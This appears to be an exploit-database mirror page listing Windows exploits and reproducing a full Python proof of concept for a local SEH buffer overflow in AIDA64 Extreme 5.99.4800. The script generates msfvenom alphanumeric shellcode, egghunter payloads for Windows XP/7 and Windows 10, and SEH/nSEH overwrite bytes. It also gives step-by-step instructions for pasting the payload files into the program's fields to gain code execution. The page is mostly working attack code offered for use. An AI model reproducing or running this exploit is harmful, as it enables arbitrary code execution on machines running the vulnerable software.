Menu

Improved exploit search engine. Try it out

"AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow"

Author

"Peyman Forouzan"

Platform

windows

Release date

2019-04-02

Release Date Title Type Platform Author
2019-04-19 "Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection" webapps windows "Vahagn Vardanyan"
2019-04-19 "Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal" webapps windows "Vahagn Vardanyan"
2019-04-18 "ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)" remote windows AkkuS
2019-04-17 "MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-17 "DHCP Server 2.5.2 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation" local windows "Digital Interruption"
2019-04-16 "AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC)" dos windows "Mücahit İsmail Aktaş"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-15 "MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "MailCarrier 2.51 - POP3 'USER' Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "RemoteMouse 3.008 - Arbitrary Remote Command Execution" remote windows 0rphon
2019-04-15 "MailCarrier 2.51 - 'RCPT TO' Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-15 "UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-12 "Microsoft Internet Explorer 11 - XML External Entity Injection" local windows hyp3rlinx
2019-04-12 "CyberArk EPM 10.2.1.603 - Security Restrictions Bypass" local windows "Alpcan Onaran"
2019-04-10 "FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer" local windows "Dino Covotsos"
2019-04-10 "FTPShell Server 6.83 - 'Account name to ban' Local Buffer" local windows "Dino Covotsos"
2019-04-09 "Microsoft Windows - AppX Deployment Service Privilege Escalation" local windows "Nabeel Ahmed"
2019-04-08 "Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow" local windows "Peyman Forouzan"
Release Date Title Type Platform Author
2019-04-08 "Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-04-05 "WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery" webapps php "Peyman Forouzan"
2019-04-05 "AIDA64 Extreme 5.99.4900 - 'Logging' SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-04-03 "AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter)" local windows "Peyman Forouzan"
2019-04-02 "AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-03-25 "X-NetStat Pro 5.63 - Local Buffer Overflow" local windows "Peyman Forouzan"
2019-03-20 "NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Advanced Host Monitor 11.92 beta - Local Buffer Overflow" local windows "Peyman Forouzan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46636/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46636/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46636/41076/aida64-extreme-edition-5994800-local-seh-buffer-overflow/download/", "exploit_id": "46636", "exploit_description": "\"AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow\"", "exploit_date": "2019-04-02", "exploit_author": "\"Peyman Forouzan\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#!/usr/bin/python                                                                                         #
# Exploit Title: AIDA64 Extreme 5.99.4800 - SEH Buffer Overflow (EggHunter)                               #
# Date: 2019-04-01                                                                                        #
# Vendor Homepage: https://www.aida64.com                                                                 #
# Software Link: http://download.aida64.com/aida64extreme599.exe                                          #
# Mirror Link : https://www.nikktech.com/main/downloads/finalwire/aida64extreme599.exe                    #
# Exploit Author: Peyman Forouzan                                                                         #
# Tested Version: 5.99.4900                                                                               #
# Tested on: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit             #
# Special Thanks to my wife                                                                               #
# The program has SEH Buffer Overflow in several places.(this code show one of them)                      #
# Note 1 : To optimize code, I've used a "stack pivot" that is the same in                                #
# (Extreme, Engineer, Network Audit) Editions.                                                            #
# So this code works in (Extreme, Engineer, Network Audit) of version 5.99.4800                           #
# But the stack pivots in Business Edition are different.                                                 #
# Note 2 : All the old versions of the program that are available on the sites like soft32.com,           #
# or in https://www.aida64.com/downloads/archive                                                          #
# have the same vulnerabily in different offsets (for example version 5.70.3800 )                         #
# Note 3 : this technique (EggHunter) has been used to run vulnerability in different windows versions.   #
# Steps :                                                                                                 #
#  1- Run python code : Aida64.py ( Three files are created )                                             #
#  2- App --> File --> Preferences --> Email --> SMTP --> paste in contents from the egg.txt              #
#         into "Display name" --> Ok                                                                      #
#  3- Report --> Report Wizard ... --> Next --> paste in contents from the egghunter-winxp-win7.txt       #
#     or egghunter-win10.txt (depend on your windows version) into "Load from file" --> Next              #
#     --> Wait a minute --> Shellcode (Calc) open                                                         #
#---------------------------------------------------------------------------------------------------------#

#------------------------------------   EGG Shellcode Generation    ---------------------------------------

bufsize = 292

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg =  "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#----------------------------------   EGG Hunter Shellcode Generation  ------------------------------------
egghunter =  "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29\xf7"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"

egghunter10 =  "\x8b\x7c\x24\x08\xbe\xe9\xfe\xff\xff\xf7\xde\x29"
egghunter10 += "\xf7\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41"
egghunter10 += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
egghunter10 += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38"
egghunter10 += "\x41\x42\x75\x4a\x49\x4d\x53\x5a\x4c\x34\x70\x50"
egghunter10 += "\x31\x69\x42\x30\x52\x70\x52\x30\x52\x62\x46\x4e"
egghunter10 += "\x6c\x4a\x6b\x6b\x30\x59\x6b\x76\x43\x44\x35\x54"
egghunter10 += "\x42\x4d\x63\x59\x50\x30\x66\x4b\x31\x59\x5a\x69"
egghunter10 += "\x6f\x56\x6f\x43\x72\x31\x42\x6b\x30\x39\x6b\x6f"
egghunter10 += "\x30\x44\x34\x44\x4c\x48\x38\x64\x7a\x39\x6e\x39"
egghunter10 += "\x6f\x49\x6f\x6c\x37\x4b\x68\x68\x4d\x64\x6e\x72"
egghunter10 += "\x7a\x58\x6b\x47\x61\x54\x71\x4b\x6b\x76\x33\x31"
egghunter10 += "\x43\x76\x33\x50\x6a\x45\x79\x46\x38\x78\x33\x39"
egghunter10 += "\x50\x45\x34\x49\x6f\x46\x73\x4f\x73\x4b\x74\x66"
egghunter10 += "\x6c\x72\x7a\x65\x6c\x46\x65\x54\x34\x5a\x73\x78"
egghunter10 += "\x38\x51\x67\x34\x70\x30\x30\x30\x74\x4b\x39\x78"
egghunter10 += "\x57\x6e\x4f\x42\x55\x48\x4e\x4e\x4f\x74\x35\x5a"
egghunter10 += "\x6b\x69\x6f\x4b\x57\x41\x41"

jmpback = "\xe9\xdc\xfe\xff\xff"  # jmp back
nseh = "\xeb\xf9\x90\x90"         # jmp Short back
seh = "\x40\x15\x40"              # Overwrite Seh - Golden Pivot !!

buffer  = egghunter
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for winxp and windows 7 ..." %len(buffer)
f = open ("egghunter-winxp-win7.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()

buffer  = egghunter10
buffer += "\x41" * (bufsize-len(buffer)-len(jmpback))
buffer += jmpback
buffer += nseh
buffer += seh
print "[+] Creating %s bytes payload for windows 10 ..." %len(buffer)
f = open ("egghunter-win10.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()